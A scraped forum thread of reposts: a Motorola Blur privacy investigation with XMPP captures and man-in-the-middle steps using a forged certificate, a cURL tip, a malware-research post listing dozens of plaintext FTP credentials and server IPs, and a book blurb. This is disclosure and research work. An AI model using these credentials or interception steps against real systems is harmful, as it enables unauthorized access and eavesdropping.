[/TD] [/TR] [TR] [TD=class: Caption] System panic auto-reboot [/TD] [/TR] [/TABLE] [/TD] [/TR] [TR] [TD=class: Details, colspan: 5] The "sync app ID" information will become more important in the section about XMPP. The system panic messge has all of the regular boot information as well as the reason for the OS auto-reboot (in my case, apparently there is a problem with the modem). [/TD] [/TR] [/TABLE] Analysis - Jabber / XMPP stream communication In some of the check-in logs, I saw entries that read e.g.: XMPPConnection: Preparing to connect user XXXXXXXXXXXXXXXX to service: jabber-cloud112-blur.svcmot.com on host: jabber-cloud112-blur.svcmot.com and port: 5222 XMPPConnectionManager I:onConfigurationUpdate: entered XMPPConnectionManager I:onConfigurationUpdate: exiting WSBase I:mother told us it's okay to retry the waiting requests: 0 NormalAsyncConnection I:Connected local addr: 192.168.253.10/192.168.253.10:60737 to remote addr: jabber-cloud112-blur.svcmot.com/69.10.176.46:5222 TLSStateManager I:org.apache.harmony.nio.internal.SocketChannelImpl@XXXXXXXX: Wrote out 212 bytes of data with 0 bytes remaining. TLSStateManager I:org.apache.harmony.nio.internal.SocketChannelImpl@XXXXXXXX: Read 202 bytes into buffer TLSStateManager I:org.apache.harmony.nio.internal.SocketChannelImpl@XXXXXXXX: Read 262 bytes into buffer TLSStateManager I:org.apache.harmony.nio.internal.SocketChannelImpl@XXXXXXXX: Wrote out 78 bytes of data with 0 bytes remaining. TLSStateManager I:org.apache.harmony.nio.internal.SocketChannelImpl@XXXXXXXX: Read 1448 bytes into buffer TLSStateManager I:org.apache.harmony.nio.internal.SocketChannelImpl@XXXXXXXX: Read 2896 bytes into buffer XMPPConnection I:Finished connecting user XXXXXXXXXXXXXXXX to service: jabber-cloud112-blur.svcmot.com on host: jabber-cloud112-blur.svcmot.com and port: 5222 By running a network capture, I was able to confirm that my phone was regularly attempting this type of connection. However, it was encrypted using TLS, so I couldn't see the content of the communication at first. The existence of this mechanism made me extremely curious. Why did Motorola need yet another communication channel for my phone to talk to them over? Why were they using a protocol intended for instant messaging/chat? The whole thing sounded very much like a botnet (which often use IRC in this way) to me. Intercepting these communications ended up being much more work than I expected. XMPP is an XML-based protocol, and cannot be proxied by an HTTP/HTTPS proxy, so using Burp Suite or ZAP was out. My first thought was to use Mallory, an intercepting transparent proxy that I learned about in the outstanding SANS SEC 642 class back in the March of 2013. Mallory is a relatively new tool, and is somewhat finnicky to get set up, but I learned a lot doing so. Unfortunately, XMPP is not a protocol that Mallory can intercept as of this writing. The VM that I built to run Mallory on still proved useful in this case, as I was eventually able to hack together a custom XMPP man-in-the-middle exploit and view the contents of the traffic. If you'd like to know more about the details, they're in the Steps to reproduce - XMPP communication channel section further down this page. This channel is at least part of the Motorola Blur command-and-control mechanism. I haven't seen enough distinct traffic pass through it to have a good idea of the full extent of its capabilities, but I know that: The XMPP/Jabber protocol is re-purposed for command-and-control use. For example, certain types of message are sent using the field normally used for "presence" status in IM. The values exchanged in the presence fields appear to be very short (five-character) base64-encoded binary data, followed by a dash, and then a sequence number. For example, 4eTO3-52, Ugs6j-10, or t2bcA-0. The base64 value appears to be selected at boot. The sequence number is incremented differently based on criteria I don't understand (yet), but the most common step I've seen is +4. As long as the channel is open, the phone will check in with Motorola every nine minutes. At least one type of Motorola-to-phone command exists: a trigger to update software by ID number. At least three such ID numbers exist: 31, 40, and 70 (see the table below). Each of these trigger an HTTP post request to the blur-services-1.0/ws/sync API method seen in the previous section, and the same IDs are logged in the check-in data. The stream token and username passed to the service are the "blurid" value (represented as a decimal number) which shows up in various places in the other traffic between the phone and Motorola. [TABLE=class: ContentTable] [TR] [TD=class: Header] ID [/TD] [TD=class: Header] Name [/TD] [TD=class: Header] Purpose [/TD] [TD=class: Header] Data Format [/TD] [TD=class: Header] Observed In Testing? [/TD] [/TR] [TR] [TD=class: Data] 2 [/TD] [TD=class: Data] BlurSettingsSyncHandler [/TD] [TD=class: Data] Unknown [/TD] [TD=class: Data] JSON [/TD] [TD=class: Data] No [/TD] [/TR] [TR] [TD=class: Data] 5 [/TD] [TD=class: Data] BlurSetupSyncHandler [/TD] [TD=class: Data] Unverified - called when a new type of sync needs to be added? [/TD] [TD=class: Data] gpb [/TD] [TD=class: Data] Yes [/TD] [/TR] [TR] [TD=class: Data] 10 [/TD] [TD=class: Data] BlurContactsSyncHandler [/TD] [TD=class: Data] Syncs contact information (e.g. Google account contacts) [/TD] [TD=class: Data] gpb [/TD] [TD=class: Data] No [/TD] [/TR] [TR] [TD=class: Data] 20 [/TD] [TD=class: Data] SNMailSyncHandler [/TD] [TD=class: Data] Unverified - probably syncs private messages from social networking sites [/TD] [TD=class: Data] gpb [/TD] [TD=class: Data] No [/TD] [/TR] [TR] [TD=class: Data] 31 [/TD] [TD=class: Data] StatusSyncHandler [/TD] [TD=class: Data] Syncs current status/most-recent-post information from social networking sites [/TD] [TD=class: Data] gpb [/TD] [TD=class: Data] Yes [/TD] [/TR] [TR] [TD=class: Data] 40 [/TD] [TD=class: Data] BlurSNFriendsSyncHandler [/TD] [TD=class: Data] Syncs friend information from social networking sites [/TD] [TD=class: Data] gpb [/TD] [TD=class: Data] Yes [/TD] [/TR] [TR] [TD=class: Data] 50 [/TD] [TD=class: Data] NewsRetrievalService [/TD] [TD=class: Data] Syncs news feeds set up in the built-in Motorola app [/TD] [TD=class: Data] gpb [/TD] [TD=class: Data] Yes [/TD] [/TR] [TR] [TD=class: Data] 60 [/TD] [TD=class: Data] AdminFlunkySyncHandler [/TD] [TD=class: Data] Unverified - sounds like some sort of remote-support functionality [/TD] [TD=class: Data] gpb [/TD] [TD=class: Data] No [/TD] [/TR] [TR] [TD=class: Data] 70 [/TD] [TD=class: Data] FeedReceiverService [/TD] [TD=class: Data] Unknown [/TD] [TD=class: Data] gpb [/TD] [TD=class: Data] Yes [/TD] [/TR] [TR] [TD=class: Data] 80 [/TD] [TD=class: Data] SNCommentsSyncHandler [/TD] [TD=class: Data] Syncs status/comment information from social networking sites [/TD] [TD=class: Data] gpb [/TD] [TD=class: Data] Yes [/TD] [/TR] [/TABLE] The "gpb" data format is how that type of binary encoding is referred to internally by the client logs. I believe it is similar (possibly identical) to Google's "protocol buffer" system. Here is an example session, including the SYNC APP command being sent by the server. Traffic from the client is represented in red. Traffic from the server is coloured blue. <stream:stream token="XXXXXXXXXXXXXXXX" to="jabber-cloud112-blur.svcmot.com" xmlns="jabber:client" xmlns:stream="http://etherx.jabber.org/streams" version="1.0"><starttls xmlns="urn:ietf:params:xml:ns:xmpp-tls"/> <?xml version='1.0' encoding='UTF-8'?><stream:stream xmlns:stream="http://etherx.jabber.org/streams" xmlns="jabber:client" from="xmpp.svcmot.com" id="concentrator08228e8bb1" xml:lang="en" version="1.0"> <stream:features><starttls xmlns="urn:ietf:params:xml:ns:xmpp-tls"></starttls><mechanisms xmlns="urn:ietf:params:xml:ns:xmpp-sasl"></mechanisms><auth xmlns="http://jabber.org/features/iq-auth"/></stream:features><proceed xmlns="urn:ietf:params:xml:ns:xmpp-tls"/> [Communication after this point takes place over the encrypted channel which the client and server have negotiated.] <stream:stream token="XXXXXXXXXXXXXXXX" to="xmpp.svcmot.com" xmlns="jabber:client" xmlns:stream="http://etherx.jabber.org/streams" version="1.0"> <?xml version='1.0' encoding='UTF-8'?><stream:stream xmlns:stream="http://etherx.jabber.org/streams" xmlns="jabber:client" from="xmpp.svcmot.com" id="concentrator08228e8bb1" xml:lang="en" version="1.0"><stream:features><mechanisms xmlns="urn:ietf:params:xml:ns:xmpp-sasl"></mechanisms><auth xmlns="http://jabber.org/features/iq-auth"/></stream:features> <iq id="4eTO3-24" type="set"><query xmlns="jabber:iq:auth"><username>4503600105521277</username><password>1-d052e26d5bbb5b4adce7965e3e248a331765623714</password><resource>BlurDevice</resource></query></iq><iq id="4eTO3-25" type="get"><query xmlns="jabber:iq:roster"></query></iq><presence id="4eTO3-26"></presence> <iq type="result" id="4eTO3-24"/> <message xmlns="urn:xmpp:motorola:motodata" id="0J8Hc-30570875" to="XXXXXXXXXXXXXXXX@jabber01.mm211.dc2b.svcmot.com"><data xmlns="com:motorola:blur:push:data:1">{"Sync":{"APP":[{"d":"sync_app_id: 31\n","q":0}]}}</data></message> [TABLE=class: InlineGroupedThumbnails, width: 600] [TR] [TD=class: MetaCaption, colspan: 5] XMPP communication channel [/TD] [/TR] [TR] [TD=class: InlineGroupedThumbnailTable] [TABLE=class: InlineGroupedThumbnail] [TR] [TD=class: Image] [/TD] [/TR] [TR] [TD=class: Caption] XMPPPeek in action [/TD] [/TR] [/TABLE] [/TD] [TD=class: InlineGroupedThumbnailTable] [TABLE=class: InlineGroupedThumbnail] [TR] [TD=class: Image] [/TD] [/TR] [TR] [TD=class: Caption] App ID 31 (social networking status) sync [/TD] [/TR] [/TABLE] [/TD] [TD=class: InlineGroupedThumbnailTable] [TABLE=class: InlineGroupedThumbnail] [TR] [TD=class: Image] [/TD] [/TR] [TR] [TD=class: Caption] App ID 40 (friends) sync [/TD] [/TR] [/TABLE] [/TD] [TD=class: InlineGroupedThumbnailTable] [TABLE=class: InlineGroupedThumbnail] [TR] [TD=class: Image] [/TD] [/TR] [TR] [TD=class: Caption] App ID 50 (news) sync [/TD] [/TR] [/TABLE] [/TD] [TD=class: InlineGroupedThumbnailTable] [TABLE=class: InlineGroupedThumbnail] [TR] [TD=class: Image] [/TD] [/TR] [TR] [TD=class: Caption] App ID 80 (social networking comments and status) sync [/TD] [/TR] [/TABLE] [/TD] [/TR] [TR] [TD=class: Details, colspan: 5] A few examples of the sync operations triggered by the XMPP communication channel. [/TD] [/TR] [/TABLE] While I have seen very little sensitive data being sent as a result of this mechanism, Motorola's privacy policy/terms-of-service related to this system makes me more concerned. There is literally no reason I can think of that I would want my phone to check in with Motorola every nine minutes to see if Motorola has any new instructions for it to execute. Is there some sort of remote-control capability intended for use by support staff? I know there is a device-location and remote wipe function, because those are advertised as features of Blur (apparently even if you didn't explicitly sign up for Blur). Speaking of that privacy policy... I honestly can't remember if I explicitly agreed to any sort of EULA when I originally set up my phone. There are numerous "terms of service" and "privacy policy" documents on the Motorola website which all seem designed to look superficially identical, but this one in particular (the one for the actual "Motorola Mobile Services" system (AKA "Blur")) has a lot of content I really don't like, and which is not present in the other, similar documents on their site that are much easier to find. For example, it specifically mentions capturing social networking credentials, as well as uploading GPS coordinates from customers' phones to Motorola. It is specific to "Motorola Mobile Services", and I know I didn't explicitly sign up for that type of account (which is probably why my phone is using a randomly-generated username and password to connect). I also know that even if I was presented with a lengthy statement which included statements about storing social media credentials, that happened when I originally bought the phone (about two years ago). Should I not have been at least reminded of this when I went to add a social networking account for the first time? Or at a bare minimum, should my phone not let me view any document I allegedly agreed to? The only reason I know of that particular TOS is because I found it referenced in a Motorola forum discussion about privacy concerns. In any case, here are some interesting excerpts from that document (as of 22 June, 2013). All bold emphasis is mine. I am not a lawyer, and this is not legal advice. Using the MOTOROLA MOBILE SERVICES software and services (MOTOROLA MOBILE SERVICES) constitutes your acceptance of the terms of the Agreement without modification. If you do not accept the terms of the Agreement, then you may not use MOTOROLA MOBILE SERVICES. Motorola collects and uses certain information about you and your mobile device ... (1) your device's unique serial number ... (5) when your device experiences a software crash ... (1) use of hardware functions like the accelerometer, GPS, wireless antennas, and touchscreen; (2) wireless carrier and network information; (3) use of accessories like headsets and docks; (4) data usage ... Personal Information such as: (1) your email and social network account credentials; (2) user settings and preferences; (3) your email and social network contacts; (4) your mobile phone number; and (5) the performance of applications installed on your device. ... MOTOROLA MOBILE SERVICES will never collect the specific content of your communications or copies of your files. The document makes a promise that the content of communications are not collected, but I have screenshots and raw data that show Facebook and Twitter messages as well as photos passing through their servers. The agreement specifies "when your device experiences a software crash", not "memory dumps taken at the time of a software crash", which are what is actually collected. Motorola takes privacy protection seriously. MOTOROLA MOBILE SERVICES only collects personal information, social network profile data, and information about websites you visit if you create a MotoCast ID, use the preinstalled web browser and/or MOTOROLA MOBILE SERVICES applications and widgets like Messaging, Gallery, Music Player, Social Networking and Social Status. If you use non-Motorola applications for email, social networking, sharing content with your friends, and web browsing, then MOTOROLA MOBILE SERVICES will not collect this information. Even if you decline to use the preinstalled browser or the MOTOROLA MOBILE SERVICES applications and widgets, your device will continue to collect information about the performance of your mobile device and how you use your mobile device unless you choose to opt out. In non-Motorola builds of Android, most/all of those components are still present, but none of them send data to Motorola. Some people might think it was extremely deceptive to add data collection to those components but not make user-visible changes to them that mentioned this. Oh, and of course the OS is still collecting massive amounts of data even if you don't use the modified basic Android functionality. MOTOROLA MOBILE SERVICES only collects and uses information about the location of your mobile device if you have enabled one or more location-based services, such as your device's GPS antenna, Google Location Services, or a carrier-provided location service. If you turn these features off in your mobile device's settings, MOTOROLA MOBILE SERVICES will not record the location of your mobile device. So what you're saying is that all I have to do to prevent Motorola from tracking my physical location is disable core functionality on my device and leave it off permanently? Awesome! Thanks so much! The security of your information is important to Motorola. When MOTOROLA MOBILE SERVICES transmits information from your mobile device to Motorola, MOTOROLA MOBILE SERVICES encrypts the transmission of that information using secure socket layer technology (SSL). Except when it doesn't, which is most of the time. However, no data stored on a mobile device or transmitted over a wireless or interactive network can ever be 100 percent secure, and many of the communications you make using MOTOROLA MOBILE SERVICES will be accessible to third parties. You should therefore be cautious when submitting any personally identifiable information using MOTOROLA MOBILE SERVICES, and you understand that you are using MOTOROLA MOBILE SERVICES at your own risk. As a global company, Motorola has international sites and users all over the world. The personal information you provide may be transmitted, used, stored, and otherwise processed outside of the country where you submitted that information, including jurisdictions that may not have data privacy laws that provide equivalent protection to such laws in your home country. You may not ... interfere with anyone's ... enjoyment of the Services Uh oh. That document does mention that anyone who wants to opt-out can email privacy@motorola.com. If you have any luck with that, please let me know. Why this is a problem While I'm sure there are a few people out there who don't mind a major multinational corporation collecting this sort of detailed tracking information related to where their phone has been and how it's been used, I believe most people would at least like to be asked about participating in this type of activity, and be given an option to turn it off. I can think of many ways that Motorola, unethical employees of Motorola, or unauthorized third parties could misuse this enormous treasure trove of information. But the biggest question on my mind is this: now that it is known that Motorola is collecting this data, can it be subpoenaed in criminal or civil cases against owners of Motorola phones? That seems like an enormous can of worms, even in comparison to the possibilities for identity theft that Motorola's system provides for. How secure is Motorola's Blur web service against attack? I'd be really interested to test this myself, but made no attempt to do so because I don't have permission and Motorola doesn't appear to have a "white hat"/"bug bounty" programme. It would be a tempting target for technically-skilled criminals, due to the large volume of Facebook, Twitter, and Google usernames and passwords stored in it. The fact that the phone actively polls Motorola for new instructions to execute and then follows those instructions without informing its owner opens all of these phones up to automated takeover by anyone who can obtain a signing SSL certificate issued by one of the authorities in the trusted CA store on those phones. Some people may consider this far-fetched, but consider that certificates of that type have been mistakenly issued in the past, and the root certificate for at least one of the CA's responsible for that type of mistake (TURKTRUST) were installed on my phone at the factory. Is there anything good to be found here? Motorola does appear to be using reasonably-strong authentication for the oAuth login to their system - the username seems to be a combination of the IMEI and a random number (16 digits long[2], in the case of my phone's username), and the password is a 160-bit value represented as a hex string. This would be essentially impossible to attack via brute-force if the value really is random. Due to its length, I'm concerned it's a hash of a fixed attribute of the phone, but that's just a hunch. The non-oAuth components (e.g. XMPP) use the Blur ID as the username, and that is all over the place, e.g. in virtually every URL (HTTP and HTTPS) that the client accesses on the Blur servers. When uploading images to social networking sites, the Motorola software on the phone sometimes strips the EXIF tags (including geolocation tags) before uploading the image to Motorola. So at least they can't always use that as another method for determining your location. Finally, both the XMPP and HTTPS client components of the software do validate that the certificates used for encrypted communication were issued by authorities the phone is configured to trust. If the certificate presented to either component is not trusted, then no encrypted channel is established, and data which would be sent over it is queued until a trusted connection can be made. If someone wants to perform a man-in-the-middle attack, they're going to need to get their root CA cert loaded on the target phones, or obtain a signing cert issued by a trusted authority (e.g. TURKTRUST). [TABLE=class: InlineGroupedThumbnails, width: 600] [TR] [TD=class: MetaCaption, colspan: 5] At least their software checks SSL cert validity [/TD] [/TR] [TR] [TD=class: InlineGroupedThumbnailTable] [TABLE=class: InlineGroupedThumbnail] [TR] [TD=class: Image] [/TD] [/TR] [TR] [TD=class: Caption] Untrusted cert - HTTPS client [/TD] [/TR] [/TABLE] [/TD] [TD=class: InlineGroupedThumbnailTable] [TABLE=class: InlineGroupedThumbnail] [TR] [TD=class: Image] [/TD] [/TR] [TR] [TD=class: Caption] Untrusted cert - XMPP client [/TD] [/TR] [/TABLE] [/TD] [TD=class: InlineGroupedThumbnailTable] [/TD] [TD=class: InlineGroupedThumbnailTable] [/TD] [TD=class: InlineGroupedThumbnailTable] [/TD] [/TR] [TR] [TD=class: Details, colspan: 5] [/TD] [/TR] [/TABLE] Has anyone else discovered this? In January of 2012, a participant in a Motorola pre-release test discovered that Motorola was performing device-tracking after a Motorola support representative mentioned that the tester had reset his phone "21 times", and a forum moderator directed him to the special, hard-to-find Motorola privacy policy discussed above. To my knowledge, this article is the first disclosure of anything like the full extent of the data Motorola collects. What I am going to do as a result of this discovery As of 23 June 2013, I've removed my ActiveSync configuration from the phone, because I can't guarantee that proprietary corporate information isn't being funneled through Motorola's servers. I know that some information (like the name of our ActiveSync server, our domain name, and a few examples of our account-naming conventions) is, but I don't have time to exhaustively test to see what else is being sent their way, or to do that every time the phone updates its configuration. I've also deleted the IMAP configuration that connected to my personal email, and have installed K-9 Mail as a temporary workaround. I'm going to figure out how to root this phone and install a "clean" version of Android. That will mean I can't use ActiveSync (my employer doesn't allow rooted phones to connect), which means a major reason I use my phone will disappear, but better that than risk sending their data to Motorola. I'll assume that other manufacturers and carriers have their own equivalent of this - recall the Carrier IQ revelation from 2011. Which other models of Motorola device do this? Right now, I have only tested my Droid X2. If you have a Motorola device and are technically-inclined, the steps to reproduce my testing are in the section below. If you get results either way and would like me to include them here, please get in touch with me using the Contact form. Please include the model of your device, the results of your testing, and your name/nickname/handle/URL/etc. if you'd like to be identified. Steps to reproduce - HTTP/HTTPS data capture There are a number of approaches that can be used to reproduce the results in this article. This is the method that I used. Of course, the same testing can be performed in order to validate that non-Motorola devices are or are not behaving this way. Important: I strongly recommend that you do not modify in any way the data your phone sends to Motorola. I also strongly recommend that you do not actively probe, scan, or test in any way the Blur web service. The instructions on this page are intended to provide a means of passively observing the traffic to Motorola in order to understand what your phone may be doing without your knowledge or consent. Connect a wireless access point to a PC which has at least two NICs. Use Windows Internet Connection Sharing to give internet access to the wireless AP and its clients. Set up an intercepting proxy on the PC. I used Burp Suite Professional for the first part of my testing, then switched to OWASP ZAP (which is free) for the rest, since I used a personal system for that phase. Make sure the proxy is accessible on at least one non-loopback address so that other devices can proxy through it.[1] Configure a Motorola Android device to connect to the wireless AP, and to use the intercepting proxy for their web traffic (in the properties for that wireless connection). Install the root signing certificate for the intercepting proxy on the Motorola Android device. This allows the intercepting proxy to view HTTPS traffic as well as unencrypted HTTP. Power the Motorola Android device off, then back on. This seems to be necessary to cause all applications to recognize the new trusted certificate, and will also let you intercept the oAuth negotiation with Motorola./li> Configure and use anything in the Account section of the device. Use the built-in Social Networking application. Take a picture and use the Share function to upload it to one or more photo-sharing services. Leave the device on for long enough that it sends other system data to Motorola automatically. Steps to reproduce - check-in data decompression If you'd like to decompress one of these gzipped data packages, there are also a number of approaches available, but this is the one I used: Export the raw (binary) request from your intercepting proxy's proxy history. In ZAP, right-click on the history entry and choose Save Raw -> Request -> Body. In Burp Suite, right-click on the history entry and choose Save Item, then uncheck the Base64-encode requests and responses box before saving. Note: you cannot use the bulk export feature of either tool for this step to work - both of them have a quirk in which exporting individual requests preserves binary data, but exporting in bulk corrupts binary data by converting a number of values to 0x3F (maybe it's some Java library that does that when exporting as ASCII?). Open the exported data in a hex editor (I use WinHex). Remove everything up to the first 0x1F8B in the file. See example screenshot below. Save the modified version (I added a .gz extension for clarity). See example screenshot below. Decompress the resulting file using e.g. the Linux gzip -d command, or e.g. 7-zip. Open the decompressed file in a text editor that correctly interprets Unix-style line breaks (I used Notepad++, partly because it shows unprintable characters in a useful way, and there is some binary data mixed in with the text in these files). Examine the data your phone is sending to Motorola. [TABLE=class: InlineGroupedThumbnails, width: 600] [TR] [TD=class: MetaCaption, colspan: 5] Manually removing extra data so the file will be recognized as gzipped [/TD] [/TR] [TR] [TD=class: InlineGroupedThumbnailTable] [TABLE=class: InlineGroupedThumbnail] [TR] [TD=class: Image] [/TD] [/TR] [TR] [TD=class: Caption] GZip header (0X1F8B) [/TD] [/TR] [/TABLE] [/TD] [TD=class: InlineGroupedThumbnailTable] [TABLE=class: InlineGroupedThumbnail] [TR] [TD=class: Image] [/TD] [/TR] [TR] [TD=class: Caption] Hex editor view of the data [/TD] [/TR] [/TABLE] [/TD] [TD=class: InlineGroupedThumbnailTable] [TABLE=class: InlineGroupedThumbnail] [TR] [TD=class: Image] [/TD] [/TR] [TR] [TD=class: Caption] Hex editing complete [/TD] [/TR] [/TABLE] [/TD] [TD=class: InlineGroupedThumbnailTable] [/TD] [TD=class: InlineGroupedThumbnailTable] [/TD] [/TR] [TR] [TD=class: Details, colspan: 5] [/TD] [/TR] [/TABLE] Steps to reproduce - XMPP communication channel This section requires more technical skill and time to replicate than the other two. Right now, it assumes that you have access to a Linux system that is set up with two network interfaces and which can be easily configured to forward all network traffic from the first interface to the second using iptables. If you have a system that is set up to run Mallory successfully already (even though you won't be using Mallory itself here), that would be ideal. I am preparing a detailed ground-up build document and will release that shortly. In the meantime, assuming you have such a system and some experience using this sort of thing, download XMPPPeek and you should have the tool you need. Generate an SSL server certificate and private key (in PEM format) with the common name of *.svcmot.com. I made all of the elements of my forged cert match the real one as closely as possible, but I don't know how important this is other than the common name. Load the CA cert you signed the *.svcmot.com cert with onto your Motorola Android device. Again, I used a CA cert that matched the human-readable elements of the one used by the real server, but I don't know how important that is in this specific case. You may need to explicitly install the forged *.svcmot.com cert onto your Motorola Android device as well. Run the shell script from the XMPPPeek page to cause all traffic from the internal interface to be forwarded to the external interface, with the exception of traffic with a destination port of 5222, which should be routed to the port that XMPPPeek will be listening on. Start XMPPPeek and wait for your phone to connect. I used a VirtualBox VM with a virtual NIC which was connected for internet access, and a USB NIC which I connected to an old wireless access point. So my phone connected to that AP, which connected through the man-in-the-middle system, which connected to the actual internet connection. I configured the phone to also proxy web traffic through OWASP ZAP so that I could match up the XMPP traffic with its HTTP and HTTPS counterparts. Footnotes [TABLE=class: FootnoteTable] [TR] [TD=class: FootnoteNumberCell] 1. [/TD] [TD=class: FootnoteContentCell] For example, with the default Windows ICS configuration, you can bind the proxy to 192.168.137.1:8071. [/TD] [/TR] [TR] [TD=class: FootnoteNumberCell] 2. [/TD] [TD=class: FootnoteContentCell] Mine starts with a 4, but does not pass a Luhn check, in case you were curious. [/TD] [/TR] [/TABLE] Sursa: Motorola Is Listening - Projects - Beneath the Waves
  9. cURL-ul pulii... Pentru cei care mai fac request-uri cu cacatul de cURL, la URL aveti grija sa dati replace la spatii cu "+": curl_setopt ($ch, CURLOPT_URL, str_replace(' ', '+', $_GET['url']));
  10. [h=3]Infiltrating malware servers without doing anything[/h] Today i was searching more samples of BlackPOS because this malware use FTP protocol. And knowing this, i was interested to crawl more panels but then i realised something... Why did i look only for BlackPOS, instead of targeting everything ? So i downloaded a random malware pack found on internet and send everything to Cuckoo. After i've just parsed each of these generated pcaps to get some stuff (simple but effective) Everything automated of course, it's too enormous to do that manually, especially on malware pack. Cuckoo. pcap junkie. Here is a small part: ftp://u479622:y6yf2023@212.46.196.140 - Win32/Usteal ftp://4bf3-cheats:hydsaww56785678@193.109.247.80 - Win32/Usteal ftp://u445497390:090171qq@31.170.164.56 - Win32/Usteal ftp://raprap8:9Y7cGxOW@89.108.68.81 - Win32/Usteal ftp://u195253707:1997qwerty@31.170.165.230 - Win32/Usteal ftp://pronzo_615:f4690x0nq8@91.223.216.18 - Win32/Usteal ftp://lordben8:xCoMFM2c@89.108.68.89 - Win32/Usteal ftp://u698037800:denisok1177@31.170.165.251 - Win32/Usteal ftp://u268995895:vovamolkov123@31.170.165.187 - Win32/Usteal ftp://b12_8082975:951753zx@209.190.85.253 - Win32/Ganelp.gen!A ftp://oiadoce:cremado33@187.17.122.141 - Win32/Delf.P ftp://cotuno:nokia400@198.23.57.29 - Win32/SecurityXploded.A ftp://fake01:13758@81.177.6.51 - WS.Reputation.1 ftp://h51694:2222559@91.227.16.13 - Win32/Usteal ftp://fintzet5@mail.ru:856cc58e698f@93.189.41.96 - Win32/Usteal ftp://b12_8082975:951753zx@209.190.85.253 - Win32/Usteal ftp://h51694:2222559@91.227.16.13 - Win32/Ganelp.E ftp://450857:6a5124c7@83.125.22.167 - Win32/Ganelp.gen!A ftp://b12_8082975:951753zx@209.190.85.253 - Win32/Ganelp.gen!A ftp://getmac:8F4ODYLQlvpjjQ==@222.35.250.56 - Win32/Ganelp.G ftp://u797638036:951753zx@31.170.165.29 - Virus.Downloader.Rozena ftp://b12_8082975:djdf3549384@10.0.2.15 - Win32/Ganelp.gen!A ftp://onthelinux:741852abc@209.202.252.54 - Win32/Ganelp.E ftp://b12_8082975:951753zx@209.190.85.253 - Win32/Ganelp.E ftp://450857:6a5124c7@83.125.22.167 - Win32/Ganelp.gen!A ftp://u206748555:as3515789@31.170.165.165 - Win32/Usteal ftp://fintzet5@mail.ru:856cc58e698f@93.189.41.96 - Win32/Usteal ftp://griptoloji:3INULAX@46.16.168.174 - Win32/Usteal ftp://u459704296:ded7753191ded@31.170.164.244 - Win32/Usteal ftp://dedmen2:reaper24chef@176.9.52.231 - Win32/Usteal ftp://srv35913:JLN18Hp7@78.110.50.123 - F*ck this shit ftp://ftp1970492:ziemniak123@213.202.225.201 - F*ck this shit ftp://dron2258:NRm8CNfW@89.108.68.89 - F*ck this shit ftp://u996543000:123456789a@31.170.165.235 - F*ck this shit ftp://u500739002:jd7H2ni99s@31.170.165.199 - F*ck this shit ftp://0dmaer:1780199d@193.109.247.83 - F*ck this shit ftp://u404100999:vardan123@31.170.164.25 - F*ck this shit ftp://a9951823:www.ry123456@31.170.161.56 - F*ck this shit ftp://u194291799:80997171405@31.170.165.18 - F*ck this shit ftp://u478149:qqgclnbi@212.46.196.140 - F*ck this shit ftp://u114972719:1052483w@31.170.165.192 - F*ck this shit ftp://a1954396:omeromer123@31.170.162.103 - F*ck this shit ftp://googgle.ueuo.com:741852@5.9.82.27 - F*ck this shit ftp://fr32920:Nw3hRUme@92.53.98.21 - F*ck this shit ftp://u974422848.root:vertrigo@31.170.164.119 - F*ck this shit ftp://u205783311:gomogej200897z@31.170.165.192 - F*ck this shit ftp://u188483768:andrewbogdanov1@31.170.165.251 - F*ck this shit ftp://coinmint@coinslut.com:c01nm1nt!@108.170.30.2 - F*ck this shit ftp://agooga:nokiamarco@198.23.57.29 - F*ck this shit ftp://nicusn:n0305441@198.23.57.29 - F*ck this shit ftp://u355595964:xmNmK4CfvX@31.170.165.193 - F*ck this shit ftp://fmstu421:oxjQG1i7@46.4.94.180 - F*ck this shit ftp://u651787226:123698745s@31.170.164.98 - F*ck this shit ftp://u492312765:530021354@31.170.165.250 - F*ck this shit ftp://mandaryn:m0jak0chanaania@213.180.150.18 - F*ck this shit ftp://spechos8:onxGoTDG@89.108.68.85 - F*ck this shit ftp://6fidaini:vardan123@193.109.247.80 - F*ck this shit ftp://8steamsell:frozenn1@195.216.243.45 - F*ck this shit ftp://u478644:57zw1q56@212.46.196.138 - F*ck this shit ftp://u478230:lytlz3ub@212.46.196.133 - F*ck this shit ftp://u730739228:warhammer3@31.170.165.238 - F*ck this shit ftp://sme8:y6kByIZA@89.108.68.85 - F*ck this shit ftp://koctbijib1@mail.ru:83670bb9072b@93.189.41.100 - F*ck this shit ftp://u457127536:741852963q@31.170.165.245 - F*ck this shit ftp://u450728967:987456987@31.170.165.187 - F*ck this shit ftp://u730739228:warhammer3@31.170.165.238 - F*ck this shit ftp://0lineage2-world:plokijuh@195.216.243.7 - F*ck this shit ftp://expox@1:0628262733Y@188.40.138.148 - F*ck this shit ftp://admin@enhanceviews.elementfx.com:123456@198.91.81.3 - F*ck this shit ftp://ih_3676461:123456@209.190.85.253 - F*ck this shit ftp://0alfa-go-cs:killer2612@195.216.243.45 - F*ck this shit ftp://5nudapac:nudapac@195.216.243.82 - F*ck this shit ftp://450857:6a5124c7@83.125.22.167 - F*ck this shit I've added signature manually by browsing VirusTotal report but i got too many results so i've just leaved 'F*ck this shit' to all of them. Crawling VirusTotal with the API can be also an idea to retrieve results but i'm lazy. Looking at random pcap i've found some was fun: Malware using free hosting service is a bad idea: Malware builded with wrong datas (epic failure) Malware badly coded: Infecting yourself with Ardamax and enabling all features on it is a bad idea: Another configuration failure: FTP's full of sh*t: You can learn about actors, eg from dedmen2@176.9.52.231, emo boy (i've included him on the ftp list): Protip: don't buy a Nikon Coolpix L14v1.0, low quality picture. I got also some false positive, this one is fun because it's a server against malware infection: I have no idea why UsbFix was on a malware pack, anyway the use of FTP protocol for legit tools is also a bad idea, and this is not the only 'anti-malware' server i've found, got some weird stuff for viral update and many others, this technic is a double edged sword but most of result lead on malware servers. Posted by Steven K at 00:18 Sursa: XyliBox: Infiltrating malware servers without doing anything
  11. Linux Kernel in a Nutshell This is the web site for the book, Linux Kernel in a Nutshell, by Greg Kroah-Hartman, published by O'Reilly. About [TABLE] [TR] [TD] To quote the "official" O'Reilly site for the book: Written by a leading developer and maintainer of the Linux kernel, Linux Kernel in a Nutshell is a comprehensive overview of kernel configuration and building, a critical task for Linux users and administrators. No distribution can provide a Linux kernel that meets all users' needs. Computers big and small have special requirements that require reconfiguring and rebuilding the kernel. Whether you are trying to get sound, wireless support, and power management working on a laptop or incorporating enterprise features such as logical volume management on a large server, you can benefit from the insights in this book. Linux Kernel in a Nutshell covers the entire range of kernel tasks, starting with downloading the source and making sure that the kernel is in sync with the versions of the tools you need. In addition to configuration and installation steps, the book offers reference material and discussions of related topics such as control of kernel options at 